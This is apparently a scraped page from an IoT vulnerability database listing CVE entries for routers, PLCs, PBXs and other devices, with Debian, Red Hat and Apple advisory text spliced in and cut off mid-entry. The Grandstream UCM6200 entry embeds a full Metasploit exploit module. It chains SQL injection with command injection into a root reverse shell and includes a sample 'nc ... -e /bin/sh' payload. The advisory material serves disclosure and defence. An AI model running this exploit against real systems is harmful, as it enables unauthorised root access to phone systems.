VARIoT IoT vulnerabilities database
| VAR-202003-0851 | CVE-2019-19964 | NETGEAR GS728TPS Authentication vulnerabilities in devices |
CVSS V2: 4.0 CVSS V3: 2.7 Severity: LOW |
On NETGEAR GS728TPS devices through 5.3.0.35, a remote attacker having network connectivity to the web-administration panel can access part of the web panel, bypassing authentication. NETGEAR GS728TPS There is an authentication vulnerability in the device.Information may be obtained. NETGEAR GS728TPS is an intelligent management switch of NETGEAR
| VAR-202003-1435 | CVE-2020-5722 | Grandstream UCM6200 In the series SQL Injection vulnerabilities |
CVSS V2: 10.0 CVSS V3: 9.8 Severity: CRITICAL |
The HTTP interface of the Grandstream UCM6200 series is vulnerable to an unauthenticated remote SQL injection via crafted HTTP request. An attacker can use this vulnerability to execute shell commands as root on versions before 1.0.19.20 or inject HTML in password recovery emails in versions before 1.0.20.17. Grandstream UCM6200 In the series SQL An injection vulnerability exists.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. Grandstream UCM6200 is a set of enterprise-level switches used for IP telephone communication by the US company Grandstream.
Grandstream UCM6200 versions prior to 1.0.19.20 and versions before 1.0.20.17 have SQL injection vulnerabilities. ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
prepend Msf::Exploit::Remote::AutoCheck
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Grandstream UCM62xx IP PBX sendPasswordEmail RCE',
'Description' => %q{
This module exploits an unauthenticated SQL injection vulnerability (CVE-2020-5722) and
a command injection vulnerability (technically, no assigned CVE but was inadvertently
patched at the same time as CVE-2019-10662) affecting the Grandstream UCM62xx IP PBX
series of devices.
Exploitation happens in two stages:
1. An SQL injection during username lookup while executing the "Forgot Password" function.
2. A command injection that occurs after the user provided username is passed to a Python script
via the shell. Like so:
/bin/sh -c python /app/asterisk/var/lib/asterisk/scripts/sendMail.py \
password '' `cat <<'TTsf7G0' z' or 1=1--`;`nc 10.0.0.3 4444 -e /bin/sh`;` TTsf7G0 `
This module affect UCM62xx versions before firmware version 1.0.19.20.
},
'License' => MSF_LICENSE,
'Author' => [
'jbaines-r7' # Vulnerability discovery, original exploit, and Metasploit module
],
'References' => [
[ 'CVE', '2020-5722' ],
[ 'EDB', '48247']
],
'DisclosureDate' => '2020-03-23',
'Platform' => ['unix', 'linux'],
'Arch' => [ARCH_CMD, ARCH_ARMLE],
'Privileged' => true,
'Targets' => [
[
'Unix Command',
{
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Type' => :unix_cmd,
'Payload' => {
'DisableNops' => true,
'BadChars' => '\'&|'
},
'DefaultOptions' => {
'PAYLOAD' => 'cmd/unix/reverse_netcat_gaping'
}
}
],
[
'Linux Dropper',
{
'Platform' => 'linux',
'Arch' => [ARCH_ARMLE],
'Type' => :linux_dropper,
'CmdStagerFlavor' => [ 'wget' ]
}
]
],
'DefaultTarget' => 1,
'DefaultOptions' => {
'RPORT' => 8089,
'SSL' => true
},
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK ]
}
)
)
register_options([
OptString.new('TARGETURI', [true, 'Base path', '/'])
])
end
##
# Sends a POST /cgi request with a payload of action=getInfo. The
# server should respond with a large json blob like the following,
# where "prog_version" is he firmware version:
#
# {"response"=>{
# "model_name"=>"UCM6202", "description"=>"IPPBX Appliance",
# "device_name"=>"", "logo"=>"images/h_logo.png", "logo_url"=>"http://www.grandstream.com/",
# "copyright"=>"Copyright \u00A9 Grandstream Networks, Inc. 2014. All Rights Reserved.",
# "num_fxo"=>"2", "num_fxs"=>"2", "num_pri"=>"0", "num_eth"=>"2", "allow_nat"=>"1",
# "svip_type"=>"4", "net_mode"=>"0", "prog_version"=>"1.0.18.13", "country"=>"US",
# "support_openvpn"=>"1", "enable_openvpn"=>"0", "enable_webrtc_openvpn"=>"0",
# "support_webrtc_cloud"=>"0"}, "status"=>0}
###
def check
normalized_uri = normalize_uri(target_uri.path, '/cgi')
vprint_status("Requesting version information from #{normalized_uri}")
res = send_request_cgi({
'method' => 'POST',
'uri' => normalized_uri,
'vars_post' => { 'action' => 'getInfo' }
})
return CheckCode::Unknown('HTTP status code is not 200') unless res&.code == 200
body_json = res.get_json_document
return CheckCode::Unknown('No JSON in response') unless body_json
prog_version = body_json.dig('response', 'prog_version')
return false if prog_version.nil?
vprint_status("The reported version is: #{prog_version}")
version = Rex::Version.new(prog_version)
if version < Rex::Version.new('1.0.19.20')
return CheckCode::Appears("This determination is based on the version string: #{prog_version}.")
end
return CheckCode::Safe("This determination is based on the version string: #{prog_version}.")
end
##
# Throws a payload at the sendPasswordEmail action. The payload must first survive an SQL injection
# and then it will get passed to a python script via sh which allows us to execute a command injection.
# It will look something like this:
#
# /bin/sh -c python /app/asterisk/var/lib/asterisk/scripts/sendMail.py \
# password '' `cat <<'TTsf7G0' z' or 1=1--`;`nc 10.0.0.3 4444 -e /bin/sh`;` TTsf7G0 `
#
# This functionality is related to the"Forgot Password" feature. This function is rate limited by
# the server so that an attacker can only invoke it, at most, every 60 seconds. As such, only a few
# payloads are appropriate.
###
def execute_command(cmd, _opts = {})
rand_num = Rex::Text.rand_text_numeric(1..5)
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, '/cgi'),
'vars_post' =>
{
'action' => 'sendPasswordEmail',
'user_name' => "' or #{rand_num}=#{rand_num}--`;`#{cmd}`;`"
}
}, 5)
# the netcat reverse shell payload holds the connection open. So we'll treat no response
# as a success. The meterpreter payload does not hold the connection open so this clause digs
# deeper to ensure it succeeded. The server will respond with a non-0 status if the payload
# generates an error (e.g. rate limit error)
if res
fail_with(Failure::UnexpectedReply, 'The target did not respond with a 200 OK') unless res.code == 200
body_json = res.get_json_document
fail_with(Failure::UnexpectedReply, 'The target did not respond with a JSON body') unless body_json
status_json = body_json['status']
fail_with(Failure::UnexpectedReply, 'The JSON response is missing the status element') unless status_json
fail_with(Failure::UnexpectedReply, "The server responded with an error status #{status_json}") unless status_json == 0
end
print_good('Exploit successfully executed.')
end
def exploit
print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
case target['Type']
when :unix_cmd
execute_command(payload.encoded)
when :linux_dropper
execute_cmdstager
end
end
end
| VAR-202003-1441 | CVE-2020-7475 | plural Schneider Electric Product injection vulnerabilities |
CVSS V2: 7.5 CVSS V3: 9.8 Severity: CRITICAL |
A CWE-74: Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection'), reflective DLL, vulnerability exists in EcoStruxure Control Expert (all versions prior to 14.1 Hot Fix), Unity Pro (all versions), Modicon M340 (all versions prior to V3.20), Modicon M580 (all versions prior to V3.10), which, if exploited, could allow attackers to transfer malicious code to the controller. plural Schneider Electric The product contains an injection vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. Schneider Electric Modicon M580, etc. are all products of Schneider Electric in France. Schneider Electric Modicon M580 is a programmable automation controller. Schneider Electric Modicon M340 is a mid-range PLC (programmable logic controller) for industrial processes and infrastructure. Schneider Electric EcoStruxure Control Expert (formerly known as Unity Pro) is a set of programming software for Schneider Electric logic controller products.
Many Schneider Electric products have injection vulnerabilities that attackers can use to send malicious code to the controller. The following products and versions are affected: EcoStruxure Control Expert 14.1 Hot Fix previous version; Unity Pro (full version); Modicon M340 V3.20 previous version; Modicon M580 V3.10 previous version
| VAR-202003-1207 | CVE-2016-11022 | plural NETGEAR Prosafe On the device OS Command injection vulnerabilities |
CVSS V2: 6.5 CVSS V3: 7.2 Severity: HIGH |
NETGEAR Prosafe WC9500 5.1.0.17, WC7600 5.1.0.17, and WC7520 2.5.0.35 devices allow a remote attacker to execute code with root privileges via shell metacharacters in the reqMethod parameter to login_handler.php. NETGEAR Prosafe WC9500 , WC7600 , WC7520 On the device OS A command injection vulnerability exists.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. NETGEAR Prosafe WC9500, etc. are all wireless controllers used by NETGEAR to manage AP access points.
There are security vulnerabilities in NETGEAR Prosafe WC9500 version 5.1.0.17, WC7600 version 5.1.0.17 and WC7520 version 2.5.0.35
| VAR-202003-1448 | CVE-2020-7482 | Andover Continuum Cross-site scripting vulnerability in |
CVSS V2: 4.3 CVSS V3: 6.1 Severity: MEDIUM |
A CWE-79:Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability exists Andover Continuum (All versions), which could cause a Reflective Cross-site Scripting (XSS attack) when using the products' web server
| VAR-202003-0389 | CVE-2020-10364 | MikroTik routers resource management error vulnerability |
CVSS V2: 7.8 CVSS V3: 7.5 Severity: HIGH |
The SSH daemon on MikroTik routers through v6.44.3 could allow remote attackers to generate CPU activity, trigger refusal of new authorized connections, and cause a reboot via connect and write system calls, because of uncontrolled resource management. plural MikroTik A router contains a resource exhaustion vulnerability.Service operation interruption (DoS) It may be put into a state. MikroTik routers is a router product of Latvian MikroTik company.
The SSH daemon in MikroTik routers v6.44.3 and previous versions has a security vulnerability. A remote attacker can use this vulnerability to prevent a new authorized connection from proceeding
| VAR-202003-1446 | CVE-2020-7480 | Andover Continuum Code injection vulnerability in |
CVSS V2: 7.5 CVSS V3: 9.8 Severity: CRITICAL |
A CWE-94: Improper Control of Generation of Code ('Code Injection') vulnerability exists in Andover Continuum (All versions), which could cause files on the application server filesystem to be viewable when an attacker interferes with an application's processing of XML data. Andover Continuum Exists in a code injection vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state
| VAR-202003-1440 | CVE-2020-7474 | ProSoft Configurator Vulnerability in uncontrolled search path elements in |
CVSS V2: 4.4 CVSS V3: 7.8 Severity: HIGH |
A CWE-427: Uncontrolled Search Path Element vulnerability exists in ProSoft Configurator (v1.002 and prior), for the PMEPXM0100 (H) module, which could cause the execution of untrusted code when using double click to open a project file which may trigger execution of a malicious DLL. ProSoft Configurator There is a vulnerability in an element of an uncontrolled search path.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. Schneider Electric ProSoft Configurator is a configuration manager for logic controllers of Schneider Electric in France.
Schneider Electric ProSoft Configurator v1.002 and previous versions (for Modicon PMEPXM0100(H) module) have code issue vulnerabilities. Attackers can use this vulnerability to execute untrusted code
| VAR-202003-1443 | CVE-2020-7477 | plural Schneider Electric Product Exceptional State Check Vulnerability |
CVSS V2: 5.0 CVSS V3: 7.5 Severity: HIGH |
A CWE-754: Improper Check for Unusual or Exceptional Conditions vulnerability exists in Quantum Ethernet Network module 140NOE771x1 (Versions 7.0 and prior), Quantum processors with integrated Ethernet – 140CPU65xxxxx (all Versions), and Premium processors with integrated Ethernet (all Versions), which could cause a Denial of Service when sending a specially crafted command over Modbus
| VAR-202003-1795 | No CVE | ABB PB610 full range of products have information disclosure vulnerabilities |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
ABB PB610 is a software designed by Swiss ABB for the CP600 control panel platform.
The ABB PB610 full range of products has an information disclosure vulnerability, which can be used by attackers to obtain sensitive information.
| VAR-202003-1812 | No CVE | Several D-Link routers have command execution vulnerabilities (CNVD-2020-15533) |
CVSS V2: 10.0 CVSS V3: - Severity: HIGH |
D-Link DIR-878, DIR-882, and DIR-867 are all D-Link router products.
Many D-Link routers have command execution vulnerabilities that attackers can use to gain control of the website server.
| VAR-202003-1813 | No CVE | ifw8 Router ROM router has unauthorized access vulnerability |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
The ifw8 Router ROM router is an enterprise-level router device of Chengdu Zhifengwang Technology Co., Ltd., which is mostly used in Internet cafes and large enterprise networks.
Ifw8 Router ROM router has an unauthorized access vulnerability, which can be exploited by attackers to obtain sensitive information.
| VAR-202003-1791 | No CVE | Xintian Technology's intelligent water management and control integrated platform system has SQL injection vulnerability |
CVSS V2: 7.8 CVSS V3: - Severity: HIGH |
Xintian Technology Co., Ltd. provides products and intelligent solutions to achieve energy saving.
Xintian Technology's intelligent water management and control integrated platform system has a SQL injection vulnerability, which can be used by attackers to obtain sensitive information.
| VAR-202003-1815 | No CVE | Netlink GPON Router certification RCE vulnerability |
CVSS V2: 10.0 CVSS V3: - Severity: HIGH |
Netlink GPON Router is a router device.
Netlink GPON Router has a certification RCE vulnerability, which can be used by attackers to take over remote target devices.
| VAR-202003-0742 | CVE-2019-16258 | Homee Brain Cube access control error vulnerability |
CVSS V2: 7.2 CVSS V3: 6.8 Severity: MEDIUM |
The bootloader of the homee Brain Cube V2 through 2.23.0 allows attackers with physical access to gain root access by manipulating the U-Boot environment via the CLI after connecting to the internal UART interface. homee Brain Cube There is a vulnerability in the lack of authentication for critical features.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. Homee Brain Cube is a smart home central control unit of German Homee company
| VAR-202003-0603 | CVE-2019-12767 | D-Link DAP-1650 On the device OS Command injection vulnerabilities |
CVSS V2: 7.5 CVSS V3: 9.8 Severity: CRITICAL |
An issue was discovered on D-Link DAP-1650 devices before 1.04B02_J65H Hot Fix. Attackers can execute arbitrary commands. D-Link DAP-1650 On the device OS A command injection vulnerability exists.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. D-Link DAP-1650 is a WiFi range extender from D-Link, Taiwan
| VAR-202003-1219 | CVE-2013-7487 | plural Swann DVR Injection vulnerabilities in devices |
CVSS V2: 6.8 CVSS V3: 9.8 Severity: CRITICAL |
On Swann DVR04B, DVR08B, DVR-16CIF, and DVR16B devices, raysharpdvr application has a vulnerable call to “system”, which allows remote attackers to execute arbitrary code via TCP port 9000. plural Swann DVR A device contains an injection vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. Swann DVR04B, etc. are all digital video recorders of American Swann company.
Many raysharpdvr applications in Swann products have injection vulnerabilities
| VAR-202003-0951 | CVE-2019-19148 | Tellabs Optical Line Terminal 1150 Authentication vulnerabilities in devices |
CVSS V2: 10.0 CVSS V3: 9.8 Severity: CRITICAL |
Tellabs Optical Line Terminal (OLT) 1150 devices allow Remote Command Execution via the -l option to TELNET or SSH. Tellabs has addressed this issue in the SR30.1 and SR31.1 release on February 18, 2020. Tellabs Optical Line Terminal (OLT) 1150 There is an authentication vulnerability in the device.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. Tellabs Optical Line Terminal (OLI) is an optical line terminal product of American Tellabs Company.
In Tellabs OLT 1150 FP29.2_015873, there is an authorization vulnerability, which can be exploited by attackers to execute commands
| VAR-202004-0061 | CVE-2020-10663 | Ruby JSON gem Input validation error vulnerability |
CVSS V2: 5.0 CVSS V3: 7.5 Severity: HIGH |
The JSON gem through 2.2.0 for Ruby, as used in Ruby 2.4 through 2.4.9, 2.5 through 2.5.7, and 2.6 through 2.6.5, has an Unsafe Object Creation Vulnerability. This is quite similar to CVE-2013-0269, but does not rely on poor garbage-collection behavior within Ruby. Specifically, use of JSON parsing methods can lead to creation of a malicious object within the interpreter, with adverse effects that are application-dependent. An attacker could exploit this vulnerability to forcibly create arbitrary objects on the target system. When parsing certain JSON documents, the
json gem can be coerced into creating arbitrary objects in the
target system.
CVE-2020-10933
Samuel Williams reported a flaw in the socket library which may lead
to exposure of possibly sensitive data from the interpreter.
For the stable distribution (buster), these problems have been fixed in
version 2.5.5-3+deb10u2.
We recommend that you upgrade your ruby2.5 packages. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
=====================================================================
Red Hat Security Advisory
Synopsis: Moderate: rh-ruby25-ruby security, bug fix, and enhancement update
Advisory ID: RHSA-2021:2104-01
Product: Red Hat Software Collections
Advisory URL: https://access.redhat.com/errata/RHSA-2021:2104
Issue date: 2021-05-25
CVE Names: CVE-2019-15845 CVE-2019-16201 CVE-2019-16254
CVE-2019-16255 CVE-2020-10663 CVE-2020-10933
CVE-2020-25613 CVE-2021-28965
=====================================================================
1. Summary:
An update for rh-ruby25-ruby is now available for Red Hat Software
Collections.
Red Hat Product Security has rated this update as having a security impact
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which
gives a detailed severity rating, is available for each vulnerability from
the CVE link(s) in the References section. Relevant releases/architectures:
Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7) - noarch, ppc64le, s390x, x86_64
Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.6) - noarch, ppc64le, s390x, x86_64
Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.7) - noarch, ppc64le, s390x, x86_64
Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7) - noarch, x86_64
3. Description:
Ruby is an extensible, interpreted, object-oriented, scripting language. It
has features to process text files and to perform system management tasks.
The following packages have been upgraded to a later upstream version:
rh-ruby25-ruby (2.5.9). (BZ#1952998)
Security Fix(es):
* ruby: NUL injection vulnerability of File.fnmatch and File.fnmatch?
(CVE-2019-15845)
* ruby: Regular expression denial of service vulnerability of WEBrick's
Digest authentication (CVE-2019-16201)
* ruby: Code injection via command argument of Shell#test / Shell#[]
(CVE-2019-16255)
* rubygem-json: Unsafe object creation vulnerability in JSON
(CVE-2020-10663)
* ruby: BasicSocket#read_nonblock method leads to information disclosure
(CVE-2020-10933)
* ruby: Potential HTTP request smuggling in WEBrick (CVE-2020-25613)
* ruby: XML round-trip vulnerability in REXML (CVE-2021-28965)
* ruby: HTTP response splitting in WEBrick (CVE-2019-16254)
For more details about the security issue(s), including the impact, a CVSS
score, acknowledgments, and other related information, refer to the CVE
page(s) listed in the References section.
Bug Fix(es):
* rh-ruby25-ruby: Resolv::DNS: timeouts if multiple IPv6 name servers are
given and address contains leading zero [rhscl-3] (BZ#1953001)
4. Solution:
For details on how to apply this update, which includes the changes
described in this advisory, refer to:
https://access.redhat.com/articles/11258
5. Package List:
Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7):
Source:
rh-ruby25-ruby-2.5.9-9.el7.src.rpm
noarch:
rh-ruby25-ruby-doc-2.5.9-9.el7.noarch.rpm
rh-ruby25-ruby-irb-2.5.9-9.el7.noarch.rpm
rh-ruby25-rubygem-did_you_mean-1.2.0-9.el7.noarch.rpm
rh-ruby25-rubygem-minitest-5.10.3-9.el7.noarch.rpm
rh-ruby25-rubygem-net-telnet-0.1.1-9.el7.noarch.rpm
rh-ruby25-rubygem-power_assert-1.1.1-9.el7.noarch.rpm
rh-ruby25-rubygem-rake-12.3.3-9.el7.noarch.rpm
rh-ruby25-rubygem-rdoc-6.0.1.1-9.el7.noarch.rpm
rh-ruby25-rubygem-test-unit-3.2.7-9.el7.noarch.rpm
rh-ruby25-rubygem-xmlrpc-0.3.0-9.el7.noarch.rpm
rh-ruby25-rubygems-2.7.6.3-9.el7.noarch.rpm
rh-ruby25-rubygems-devel-2.7.6.3-9.el7.noarch.rpm
ppc64le:
rh-ruby25-ruby-2.5.9-9.el7.ppc64le.rpm
rh-ruby25-ruby-debuginfo-2.5.9-9.el7.ppc64le.rpm
rh-ruby25-ruby-devel-2.5.9-9.el7.ppc64le.rpm
rh-ruby25-ruby-libs-2.5.9-9.el7.ppc64le.rpm
rh-ruby25-rubygem-bigdecimal-1.3.4-9.el7.ppc64le.rpm
rh-ruby25-rubygem-io-console-0.4.6-9.el7.ppc64le.rpm
rh-ruby25-rubygem-json-2.1.0-9.el7.ppc64le.rpm
rh-ruby25-rubygem-openssl-2.1.2-9.el7.ppc64le.rpm
rh-ruby25-rubygem-psych-3.0.2-9.el7.ppc64le.rpm
s390x:
rh-ruby25-ruby-2.5.9-9.el7.s390x.rpm
rh-ruby25-ruby-debuginfo-2.5.9-9.el7.s390x.rpm
rh-ruby25-ruby-devel-2.5.9-9.el7.s390x.rpm
rh-ruby25-ruby-libs-2.5.9-9.el7.s390x.rpm
rh-ruby25-rubygem-bigdecimal-1.3.4-9.el7.s390x.rpm
rh-ruby25-rubygem-io-console-0.4.6-9.el7.s390x.rpm
rh-ruby25-rubygem-json-2.1.0-9.el7.s390x.rpm
rh-ruby25-rubygem-openssl-2.1.2-9.el7.s390x.rpm
rh-ruby25-rubygem-psych-3.0.2-9.el7.s390x.rpm
x86_64:
rh-ruby25-ruby-2.5.9-9.el7.x86_64.rpm
rh-ruby25-ruby-debuginfo-2.5.9-9.el7.x86_64.rpm
rh-ruby25-ruby-devel-2.5.9-9.el7.x86_64.rpm
rh-ruby25-ruby-libs-2.5.9-9.el7.x86_64.rpm
rh-ruby25-rubygem-bigdecimal-1.3.4-9.el7.x86_64.rpm
rh-ruby25-rubygem-io-console-0.4.6-9.el7.x86_64.rpm
rh-ruby25-rubygem-json-2.1.0-9.el7.x86_64.rpm
rh-ruby25-rubygem-openssl-2.1.2-9.el7.x86_64.rpm
rh-ruby25-rubygem-psych-3.0.2-9.el7.x86_64.rpm
Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.6):
Source:
rh-ruby25-ruby-2.5.9-9.el7.src.rpm
noarch:
rh-ruby25-ruby-doc-2.5.9-9.el7.noarch.rpm
rh-ruby25-ruby-irb-2.5.9-9.el7.noarch.rpm
rh-ruby25-rubygem-did_you_mean-1.2.0-9.el7.noarch.rpm
rh-ruby25-rubygem-minitest-5.10.3-9.el7.noarch.rpm
rh-ruby25-rubygem-net-telnet-0.1.1-9.el7.noarch.rpm
rh-ruby25-rubygem-power_assert-1.1.1-9.el7.noarch.rpm
rh-ruby25-rubygem-rake-12.3.3-9.el7.noarch.rpm
rh-ruby25-rubygem-rdoc-6.0.1.1-9.el7.noarch.rpm
rh-ruby25-rubygem-test-unit-3.2.7-9.el7.noarch.rpm
rh-ruby25-rubygem-xmlrpc-0.3.0-9.el7.noarch.rpm
rh-ruby25-rubygems-2.7.6.3-9.el7.noarch.rpm
rh-ruby25-rubygems-devel-2.7.6.3-9.el7.noarch.rpm
ppc64le:
rh-ruby25-ruby-2.5.9-9.el7.ppc64le.rpm
rh-ruby25-ruby-debuginfo-2.5.9-9.el7.ppc64le.rpm
rh-ruby25-ruby-devel-2.5.9-9.el7.ppc64le.rpm
rh-ruby25-ruby-libs-2.5.9-9.el7.ppc64le.rpm
rh-ruby25-rubygem-bigdecimal-1.3.4-9.el7.ppc64le.rpm
rh-ruby25-rubygem-io-console-0.4.6-9.el7.ppc64le.rpm
rh-ruby25-rubygem-json-2.1.0-9.el7.ppc64le.rpm
rh-ruby25-rubygem-openssl-2.1.2-9.el7.ppc64le.rpm
rh-ruby25-rubygem-psych-3.0.2-9.el7.ppc64le.rpm
s390x:
rh-ruby25-ruby-2.5.9-9.el7.s390x.rpm
rh-ruby25-ruby-debuginfo-2.5.9-9.el7.s390x.rpm
rh-ruby25-ruby-devel-2.5.9-9.el7.s390x.rpm
rh-ruby25-ruby-libs-2.5.9-9.el7.s390x.rpm
rh-ruby25-rubygem-bigdecimal-1.3.4-9.el7.s390x.rpm
rh-ruby25-rubygem-io-console-0.4.6-9.el7.s390x.rpm
rh-ruby25-rubygem-json-2.1.0-9.el7.s390x.rpm
rh-ruby25-rubygem-openssl-2.1.2-9.el7.s390x.rpm
rh-ruby25-rubygem-psych-3.0.2-9.el7.s390x.rpm
x86_64:
rh-ruby25-ruby-2.5.9-9.el7.x86_64.rpm
rh-ruby25-ruby-debuginfo-2.5.9-9.el7.x86_64.rpm
rh-ruby25-ruby-devel-2.5.9-9.el7.x86_64.rpm
rh-ruby25-ruby-libs-2.5.9-9.el7.x86_64.rpm
rh-ruby25-rubygem-bigdecimal-1.3.4-9.el7.x86_64.rpm
rh-ruby25-rubygem-io-console-0.4.6-9.el7.x86_64.rpm
rh-ruby25-rubygem-json-2.1.0-9.el7.x86_64.rpm
rh-ruby25-rubygem-openssl-2.1.2-9.el7.x86_64.rpm
rh-ruby25-rubygem-psych-3.0.2-9.el7.x86_64.rpm
Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.7):
Source:
rh-ruby25-ruby-2.5.9-9.el7.src.rpm
noarch:
rh-ruby25-ruby-doc-2.5.9-9.el7.noarch.rpm
rh-ruby25-ruby-irb-2.5.9-9.el7.noarch.rpm
rh-ruby25-rubygem-did_you_mean-1.2.0-9.el7.noarch.rpm
rh-ruby25-rubygem-minitest-5.10.3-9.el7.noarch.rpm
rh-ruby25-rubygem-net-telnet-0.1.1-9.el7.noarch.rpm
rh-ruby25-rubygem-power_assert-1.1.1-9.el7.noarch.rpm
rh-ruby25-rubygem-rake-12.3.3-9.el7.noarch.rpm
rh-ruby25-rubygem-rdoc-6.0.1.1-9.el7.noarch.rpm
rh-ruby25-rubygem-test-unit-3.2.7-9.el7.noarch.rpm
rh-ruby25-rubygem-xmlrpc-0.3.0-9.el7.noarch.rpm
rh-ruby25-rubygems-2.7.6.3-9.el7.noarch.rpm
rh-ruby25-rubygems-devel-2.7.6.3-9.el7.noarch.rpm
ppc64le:
rh-ruby25-ruby-2.5.9-9.el7.ppc64le.rpm
rh-ruby25-ruby-debuginfo-2.5.9-9.el7.ppc64le.rpm
rh-ruby25-ruby-devel-2.5.9-9.el7.ppc64le.rpm
rh-ruby25-ruby-libs-2.5.9-9.el7.ppc64le.rpm
rh-ruby25-rubygem-bigdecimal-1.3.4-9.el7.ppc64le.rpm
rh-ruby25-rubygem-io-console-0.4.6-9.el7.ppc64le.rpm
rh-ruby25-rubygem-json-2.1.0-9.el7.ppc64le.rpm
rh-ruby25-rubygem-openssl-2.1.2-9.el7.ppc64le.rpm
rh-ruby25-rubygem-psych-3.0.2-9.el7.ppc64le.rpm
s390x:
rh-ruby25-ruby-2.5.9-9.el7.s390x.rpm
rh-ruby25-ruby-debuginfo-2.5.9-9.el7.s390x.rpm
rh-ruby25-ruby-devel-2.5.9-9.el7.s390x.rpm
rh-ruby25-ruby-libs-2.5.9-9.el7.s390x.rpm
rh-ruby25-rubygem-bigdecimal-1.3.4-9.el7.s390x.rpm
rh-ruby25-rubygem-io-console-0.4.6-9.el7.s390x.rpm
rh-ruby25-rubygem-json-2.1.0-9.el7.s390x.rpm
rh-ruby25-rubygem-openssl-2.1.2-9.el7.s390x.rpm
rh-ruby25-rubygem-psych-3.0.2-9.el7.s390x.rpm
x86_64:
rh-ruby25-ruby-2.5.9-9.el7.x86_64.rpm
rh-ruby25-ruby-debuginfo-2.5.9-9.el7.x86_64.rpm
rh-ruby25-ruby-devel-2.5.9-9.el7.x86_64.rpm
rh-ruby25-ruby-libs-2.5.9-9.el7.x86_64.rpm
rh-ruby25-rubygem-bigdecimal-1.3.4-9.el7.x86_64.rpm
rh-ruby25-rubygem-io-console-0.4.6-9.el7.x86_64.rpm
rh-ruby25-rubygem-json-2.1.0-9.el7.x86_64.rpm
rh-ruby25-rubygem-openssl-2.1.2-9.el7.x86_64.rpm
rh-ruby25-rubygem-psych-3.0.2-9.el7.x86_64.rpm
Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7):
Source:
rh-ruby25-ruby-2.5.9-9.el7.src.rpm
noarch:
rh-ruby25-ruby-doc-2.5.9-9.el7.noarch.rpm
rh-ruby25-ruby-irb-2.5.9-9.el7.noarch.rpm
rh-ruby25-rubygem-did_you_mean-1.2.0-9.el7.noarch.rpm
rh-ruby25-rubygem-minitest-5.10.3-9.el7.noarch.rpm
rh-ruby25-rubygem-net-telnet-0.1.1-9.el7.noarch.rpm
rh-ruby25-rubygem-power_assert-1.1.1-9.el7.noarch.rpm
rh-ruby25-rubygem-rake-12.3.3-9.el7.noarch.rpm
rh-ruby25-rubygem-rdoc-6.0.1.1-9.el7.noarch.rpm
rh-ruby25-rubygem-test-unit-3.2.7-9.el7.noarch.rpm
rh-ruby25-rubygem-xmlrpc-0.3.0-9.el7.noarch.rpm
rh-ruby25-rubygems-2.7.6.3-9.el7.noarch.rpm
rh-ruby25-rubygems-devel-2.7.6.3-9.el7.noarch.rpm
x86_64:
rh-ruby25-ruby-2.5.9-9.el7.x86_64.rpm
rh-ruby25-ruby-debuginfo-2.5.9-9.el7.x86_64.rpm
rh-ruby25-ruby-devel-2.5.9-9.el7.x86_64.rpm
rh-ruby25-ruby-libs-2.5.9-9.el7.x86_64.rpm
rh-ruby25-rubygem-bigdecimal-1.3.4-9.el7.x86_64.rpm
rh-ruby25-rubygem-io-console-0.4.6-9.el7.x86_64.rpm
rh-ruby25-rubygem-json-2.1.0-9.el7.x86_64.rpm
rh-ruby25-rubygem-openssl-2.1.2-9.el7.x86_64.rpm
rh-ruby25-rubygem-psych-3.0.2-9.el7.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/
7. References:
https://access.redhat.com/security/cve/CVE-2019-15845
https://access.redhat.com/security/cve/CVE-2019-16201
https://access.redhat.com/security/cve/CVE-2019-16254
https://access.redhat.com/security/cve/CVE-2019-16255
https://access.redhat.com/security/cve/CVE-2020-10663
https://access.redhat.com/security/cve/CVE-2020-10933
https://access.redhat.com/security/cve/CVE-2020-25613
https://access.redhat.com/security/cve/CVE-2021-28965
https://access.redhat.com/security/updates/classification/#moderate
8. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2021 Red Hat, Inc. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
APPLE-SA-2020-12-14-4 Additional information for
APPLE-SA-2020-11-13-1 macOS Big Sur 11.0.1
macOS Big Sur 11.0.1 addresses the following issues.
Information about the security content is also available at
https://support.apple.com/HT211931.
AMD
Available for: Mac Pro (2013 and later), MacBook Air (2013 and
later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later),
iMac (2014 and later), MacBook (2015 and later), iMac Pro (all
models)
Impact: A malicious application may be able to execute arbitrary code
with system privileges
